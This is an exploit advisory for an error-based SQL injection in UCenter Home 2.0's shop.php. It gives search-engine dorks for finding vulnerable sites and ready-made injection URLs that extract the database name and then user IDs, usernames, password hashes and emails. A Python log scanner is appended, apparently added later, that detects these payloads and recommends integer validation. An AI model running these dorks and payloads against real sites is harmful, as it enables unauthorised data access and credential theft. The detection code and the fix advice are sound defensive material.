__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim database name.

For inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
..

DB : Okay.
Edit the DB name : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
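
Detection check for the requests above, added here as an example and not part of the original advisory: it scans web access logs for shop.php requests whose shopid is not a plain integer and records which markers of the error-based payload shape appear. The combined log format, the marker list and the sample log lines are assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers taken from the payload shape shown in this advisory (MySQL error-based).
MARKERS = ("information_schema", "floor(rand(", "group by", "concat(", "select")

# Assumption: Apache/nginx "combined" access log format.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 700 "-" "-"',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?shopid=abc HTTP/1.1" 200 100 "-" "-"',
]


def inspect_line(line):
    """Return a finding for a shop.php request with a non-integer shopid, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    try:
        parts = urlsplit(m.group("target"))
    except ValueError:
        return None  # malformed request target
    if not parts.path.lower().endswith("/shop.php"):
        return None
    # parse_qs percent-decodes and maps '+' to space, so encoded payloads are normalised.
    for value in parse_qs(parts.query, keep_blank_values=True).get("shopid", []):
        if re.fullmatch(r"[0-9]{1,10}", value):
            continue  # a legitimate shop id is a plain integer
        lowered = re.sub(r"\s+", " ", value.lower())
        hits = [mk for mk in MARKERS if mk in lowered]
        return {"ip": m.group("ip"), "shopid": value, "markers": hits,
                "verdict": "sqli-pattern" if hits else "non-numeric"}
    return None


def scan(lines):
    """Run inspect_line over an iterable of log lines and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer check applied to shopid inside the application, before the value reaches the query, removes the injection point.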